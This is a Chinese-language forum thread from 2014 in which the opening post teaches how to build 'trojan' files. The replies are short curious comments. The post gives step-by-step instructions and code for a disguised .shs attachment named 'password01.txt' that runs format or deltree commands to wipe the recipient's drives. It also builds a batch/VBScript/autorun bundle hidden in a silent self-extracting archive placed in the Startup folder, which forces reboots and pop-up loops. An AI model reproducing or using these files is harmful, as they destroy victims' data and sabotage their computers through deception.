查看: 9542|回复: 4

教你制作木马病毒

[复制链接]
  • TA的每日心情
    擦汗
    2014-2-12 10:49
  • 签到天数: 150 天

    连续签到: 1 天

    [LV.7]常住居民III

    发表于 2014-3-18 10:35:51 | 显示全部楼层 |阅读模式
    分享到:
    先说说病毒的来源吧:首先可能你在网上曾经听到过木马,当然倒霉的话,也许也中过木马,但你可能还是不曾了解木马这个词的由来,木马这个词的来源:记得历史上特洛伊木马的故事吗?希腊人围困特洛伊城长达九年的时间。然后在某一天早上,他们似乎是退却了。希腊人站在城墙上望去,看到的不是希腊军队,而是一件礼物——一匹巨大的木马。由于马是特洛伊人的圣物,所以他们费力地将木马拖入城内,没有发现隐藏在其中的希腊士兵。希腊人进入特洛伊城后,耐心地等待黄昏的来临,然后钻出马外。他们杀死了看守城门的士兵,并打开了城门。最后,特洛伊城陷落了,这正是一句著名谚语“当心希腊人的礼物”的由来。“木马”程序是目前比较流行的病毒文件,与一般的病毒不同,它不会自我繁殖,也并不“刻意”地去感染其他文件,它通过将自身伪装吸引用户下载执行,向施种木马者提供打开被种者电脑的门户,使施种者可以任意毁坏、窃取被种者的文件,甚至远程操控被种者的电脑。(但你可绝对不能干坏事)
    方法一:
    TXT炸弹
    1.创建一个只包含一个空格的文本文本档
    1.jpg
    (为了减小文件体积)的文本文件,任意取名。
    2.打开{写字板文档},将此文件拖放入{写字板文档}。也可以点击记{写字板
    文档}单栏中的“插入\对象”,弹出“插入对象”对话框,选中“从文件创建”,然后
    点击“浏览”按钮选择要插入的文件。
    3.选中该插入对象的图标,选择菜单栏中的“编辑\包对象\编辑包”(如图1)。在弹
    出的“对象包装程序”对话框中,选择菜单栏中的“编辑\命令行”,然后输入如下命令
    start.exe /m format c:/q /autotest /u ,点击“确定”,此时,内容栏中会显示
    出命令内容。
    4.点击外观栏中的“插入图标”按钮,会弹出一个警告对话框,确认,然后任选一
    个图标。
    5.选择菜单栏中的“编辑\卷标”,为此嵌入对象取一个名称(会替换原来的文件名
    )。点击“文件”菜单中的“更新”,然后关闭此对话框。
    6.将刚刚建立的嵌入对象拖放到桌面上。文件的默认名是“碎片”(在2000下的默
    认名为”片段”),现在我们把它改成“password01.txt”。打开电子邮件程序将桌面
    上的“password01.txt”作为附件发出,或者将含有嵌入对象(带有恶意命令)的文档作
    为附件发出。
    7.当邮件接收者误将“password01.txt.shs”文件作为“password01.txt(如前文
    所述,“.SHS”扩展名永远是隐藏的)放心地打开时,或打开文件,点击文件中的嵌入对
    象时触发恶意命令(弹出DOS运行窗口,执行格式化命令).如果将上面的命令替换为:st
    art.exe /m deltree /y a:\*.* c:\*.* d:\*.* 则是将删除对方硬盘下所有文件(盘符
    根据实际情况自定义);如果替换为:start.exe /m deltree /y
    c:\windows\system\*.* 则是删除对方c:\windows\system\目录底下的所有文件.(当
    然大家可以改成其它的命令)
    方法二:
    恶意软件
    1.新建三个文本先把他们命名为1 2 3


    2.jpg
    在文本一输入
    [AutoRun]
    open=shell.dat
    重命名为inf的格式,文件名自定吧!
    2.在第二个文本:输入:
    @echo off
    xxx.vbe
    c:\windows\explorer c:\
    del autorun.inf
    del rad.exe
    del shell.bat
    然后转化为bat格式,文件名字命名为:shell.batxxx.vbe中的xxx是你做(任意一个)的文件名,这里你写上去是需要更改一下!)
    3.继续在文本三,输入:
    on error resume next
    dim WSHshellA
    set WSHshellA = wscript.createobject("wscript.shell")
    WSHshellA.run "cmd.exe /c shutdown -r -t 0 -c ""....(请保留好计算机正在处理的数据"" ",0 ,true
    dim a
    do while(a <> "1000")
    a = inputbox ("开始运行: .exe ""请等待....","处理程序","...处理中,请稍候...",8000,7000)
    msgbox chr(13) + chr(13) + chr(13) + a,0,"结束运行 .exe,正在准备重启计算机"
    loop
    dim WSHshell
    set WSHshell = wscript.createobject("wscript.shell")
    WSHshell.run "cmd.exe /c shutdown -a",0 ,true
    msgbox chr(13)+chr(13)+chr(13)+"完毕
    (全部输入,请勿修改,修改会导致不成功的可能!)
    3.jpg
    然后转换为vbe格式
    文件制作完毕!


    4.jpg
    全选择文件,压缩,弹出对话栏,压缩选项选择创建自解压式文件,然后点击高级,在点击自解压选项,解压路径填:C:\Documents and Settings\Administrator\「开始」菜单\程序\启动 然后填上解压后运行:shell.bat,然后点击模式,在安静模式里选择全部隐藏,ok,开始压缩!
    这样,一个恶意软件就生成了~



    回复

    使用道具 举报

  • TA的每日心情
    郁闷
    2024-10-28 10:11
  • 签到天数: 1703 天

    连续签到: 1 天

    [LV.Master]伴坛终老

    发表于 2014-3-18 13:48:22 | 显示全部楼层
    小明你太淘气了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    开心
    2020-1-18 12:34
  • 签到天数: 1673 天

    连续签到: 2 天

    [LV.Master]伴坛终老

    发表于 2014-3-18 21:17:51 | 显示全部楼层
    我想知道运行了之后会怎么样
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-12-20 08:26
  • 签到天数: 449 天

    连续签到: 1 天

    [LV.9]以坛为家II

    发表于 2014-3-20 08:53:08 | 显示全部楼层
      运行了会怎么样
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2016-10-14 22:55
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    发表于 2016-10-7 22:45:43 | 显示全部楼层
    杀毒软件会杀掉吗?
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 注册/登录

    本版积分规则

    关闭

    站长推荐上一条 /4 下一条



    手机版|小黑屋|与非网

    GMT+8, 2024-11-23 22:42 , Processed in 0.145379 second(s), 24 queries , MemCache On.

    ICP经营许可证 苏B2-20140176  苏ICP备14012660号-2   苏州灵动帧格网络科技有限公司 版权所有.

    苏公网安备 32059002001037号

    Powered by Discuz! X3.4

    Copyright © 2001-2024, Tencent Cloud.